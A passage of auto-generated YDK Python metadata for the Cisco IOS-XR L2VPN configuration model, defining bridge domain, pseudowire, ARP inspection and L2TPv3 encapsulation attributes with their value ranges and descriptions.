_MetaInfoClassMember('interface-mac', REFERENCE_CLASS, 'InterfaceMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac',
[], [],
''' MAC configuration commands
''',
'interface_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mld-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a MLD Snooping profile
''',
'interface_mld_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-profile', REFERENCE_CLASS, 'InterfaceProfile' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceProfile',
[], [],
''' Attach a DHCP profile
''',
'interface_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('split-horizon', REFERENCE_CLASS, 'SplitHorizon' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon',
[], [],
''' Split Horizon
''',
'split_horizon',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static-mac-addresses', REFERENCE_CLASS, 'StaticMacAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses',
[], [],
''' Static Mac Address Table
''',
'static_mac_addresses',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits',
False,
[
_MetaInfoClassMember('bd-attachment-circuit', REFERENCE_LIST, 'BdAttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit',
[], [],
''' Name of the Attachment Circuit
''',
'bd_attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns.BdPseudowireEvpn' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns.BdPseudowireEvpn',
False,
[
_MetaInfoClassMember('acid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' AC ID
''',
'acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '65534')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pseudowire-evpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns',
False,
[
_MetaInfoClassMember('bd-pseudowire-evpn', REFERENCE_LIST, 'BdPseudowireEvpn' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns.BdPseudowireEvpn',
[], [],
''' EVPN Pseudowire configuration
''',
'bd_pseudowire_evpn',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pseudowire-evpns',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.IpSourceGuard' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.IpSourceGuard',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IP Source Guard
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ip-source-guard',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai.DaiAddressValidation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai.DaiAddressValidation',
False,
[
_MetaInfoClassMember('destination-mac-verification', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Destination MAC Verification
''',
'destination_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Address Validation
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ipv4-verification', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IPv4 Verification
''',
'ipv4_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-mac-verification', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Source MAC Verification
''',
'source_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'dai-address-validation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai',
False,
[
_MetaInfoClassMember('dai-address-validation', REFERENCE_CLASS, 'DaiAddressValidation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai.DaiAddressValidation',
[], [],
''' Address Validation
''',
'dai_address_validation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Dynamic ARP Inspection
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'dai',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces.RoutedInterface' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces.RoutedInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' The name of the Routed Interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'routed-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces',
False,
[
_MetaInfoClassMember('routed-interface', REFERENCE_LIST, 'RoutedInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces.RoutedInterface',
[], [],
''' Bridge Domain Routed Interface
''',
'routed_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'routed-interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 27)], [],
''' Name of the bridge domain
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bd-attachment-circuits', REFERENCE_CLASS, 'BdAttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits',
[], [],
''' Attachment Circuit table
''',
'bd_attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pseudowire-evpns', REFERENCE_CLASS, 'BdPseudowireEvpns' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns',
[], [],
''' List of EVPN pseudowires
''',
'bd_pseudowire_evpns',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pseudowires', REFERENCE_CLASS, 'BdPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires',
[], [],
''' List of pseudowires
''',
'bd_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-storm-controls', REFERENCE_CLASS, 'BdStormControls' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls',
[], [],
''' Storm Control
''',
'bd_storm_controls',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-evis', REFERENCE_CLASS, 'BridgeDomainEvis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis',
[], [],
''' Bridge Domain EVI Table
''',
'bridge_domain_evis',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-mac', REFERENCE_CLASS, 'BridgeDomainMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac',
[], [],
''' MAC configuration commands
''',
'bridge_domain_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-mtu', ATTRIBUTE, 'int' , None, None,
[('46', '65535')], [],
''' Maximum transmission unit for this Bridge
Domain
''',
'bridge_domain_mtu',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-pbb', REFERENCE_CLASS, 'BridgeDomainPbb' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb',
[], [],
''' Bridge Domain PBB
''',
'bridge_domain_pbb',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('coupled-mode', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Coupled-mode configuration
''',
'coupled_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('dai', REFERENCE_CLASS, 'Dai' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai',
[], [],
''' Dynamic ARP Inspection
''',
'dai',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('dhcp', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' DHCPv4 Snooping profile name
''',
'dhcp',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flooding', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable flooding
''',
'flooding',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flooding-unknown-unicast', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Unknown Unicast flooding
''',
'flooding_unknown_unicast',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('igmp-snooping', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach IGMP Snooping Profile Name
''',
'igmp_snooping',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('igmp-snooping-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable IGMP Snooping
''',
'igmp_snooping_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ip-source-guard', REFERENCE_CLASS, 'IpSourceGuard' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.IpSourceGuard',
[], [],
''' IP Source Guard
''',
'ip_source_guard',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('member-vnis', REFERENCE_CLASS, 'MemberVnis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis',
[], [],
''' Bridge Domain VxLAN Network Identifier
Table
''',
'member_vnis',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mld-snooping', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach MLD Snooping Profile Name
''',
'mld_snooping',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('nv-satellite', REFERENCE_CLASS, 'NvSatellite' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.NvSatellite',
[], [],
''' nV Satellite
''',
'nv_satellite',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('routed-interfaces', REFERENCE_CLASS, 'RoutedInterfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces',
[], [],
''' Bridge Domain Routed Interface Table
''',
'routed_interfaces',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('shutdown', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' shutdown the Bridge Domain
''',
'shutdown',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('transport-mode', REFERENCE_ENUM_CLASS, 'BridgeDomainTransportModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BridgeDomainTransportModeEnum',
[], [],
''' Bridge Domain Transport mode
''',
'transport_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfis', REFERENCE_CLASS, 'Vfis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis',
[], [],
''' Specify the virtual forwarding interface
name
''',
'vfis',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains',
False,
[
_MetaInfoClassMember('bridge-domain', REFERENCE_LIST, 'BridgeDomain' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain',
[], [],
''' bridge domain
''',
'bridge_domain',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domains',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the Bridge group
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bridge-domains', REFERENCE_CLASS, 'BridgeDomains' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains',
[], [],
''' List of Bridge Domain
''',
'bridge_domains',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups',
False,
[
_MetaInfoClassMember('bridge-domain-group', REFERENCE_LIST, 'BridgeDomainGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup',
[], [],
''' Bridge group
''',
'bridge_domain_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-groups',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.Sequencing' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.Sequencing',
False,
[
_MetaInfoClassMember('resync-threshold', ATTRIBUTE, 'int' , None, None,
[('5', '65535')], [],
''' Out of sequence threshold
''',
'resync_threshold',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('sequencing', REFERENCE_ENUM_CLASS, 'L2Tpv3SequencingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Tpv3SequencingEnum',
[], [],
''' Sequencing
''',
'sequencing',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'sequencing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.TypeOfService' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.TypeOfService',
False,
[
_MetaInfoClassMember('type-of-service-mode', REFERENCE_ENUM_CLASS, 'TypeOfServiceModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'TypeOfServiceModeEnum',
[], [],
''' Type of service mode
''',
'type_of_service_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type-of-service-value', ATTRIBUTE, 'int' , None, None,
[('0', '255')], [],
''' Type of service value
''',
'type_of_service_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'type-of-service',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.SignalingProtocol' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.SignalingProtocol',
False,
[
_MetaInfoClassMember('l2tpv3-class-name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the L2TPv3 class name
''',
'l2tpv3_class_name',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('protocol', REFERENCE_ENUM_CLASS, 'L2TpSignalingProtocolEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpSignalingProtocolEnum',
[], [],
''' L2TPv3 signaling protocol
''',
'protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'signaling-protocol',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.PathMtu' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.PathMtu',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable path MTU
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('max-path-mtu', ATTRIBUTE, 'int' , None, None,
[('68', '65535')], [],
''' Maximum path maximum transmission unit
''',
'max_path_mtu',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'path-mtu',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation',
False,
[
_MetaInfoClassMember('cookie-size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Cookie size
''',
'cookie_size',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('df-bit-set', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Set the do not fragment bit to 1
''',
'df_bit_set',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable L2TPv3 encapsulation
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('path-mtu', REFERENCE_CLASS, 'PathMtu' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.PathMtu',
[], [],
''' Path maximum transmission unit
''',
'path_mtu',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('sequencing', REFERENCE_CLASS, 'Sequencing' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.Sequencing',
[], [],
''' Sequencing
''',
'sequencing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('signaling-protocol', REFERENCE_CLASS, 'SignalingProtocol' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.SignalingProtocol',
[], [],
''' L2TPv3 signaling protocol
''',
'signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Source IP address
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('time-to-live', ATTRIBUTE, 'int' , None, None,
[('1', '255')], [],
''' Time to live
''',
'time_to_live',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('transport-mode', REFERENCE_ENUM_CLASS, 'TransportModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'TransportModeEnum',
[], [],
''' Transport mode
''',
'transport_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type-of-service', REFERENCE_CLASS, 'TypeOfService' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.TypeOfService',
[], [],
''' Type of service
''',
'type_of_service',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tpv3-encapsulation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.BackupDisableDelay' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.BackupDisableDelay',
False,
[
_MetaInfoClassMember('disable-backup', ATTRIBUTE, 'int' , None, None,
[('0', '180')], [],
''' Disable backup delay
''',
'disable_backup',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BackupDisableEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BackupDisableEnum',
[], [],
''' Delay or Never
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-disable-delay',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.Sequencing' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.Sequencing',
False,
[
_MetaInfoClassMember('resync-threshold', ATTRIBUTE, 'int' , None, None,
[('5', '65535')], [],
''' Out of sequence threshold
''',
'resync_threshold',
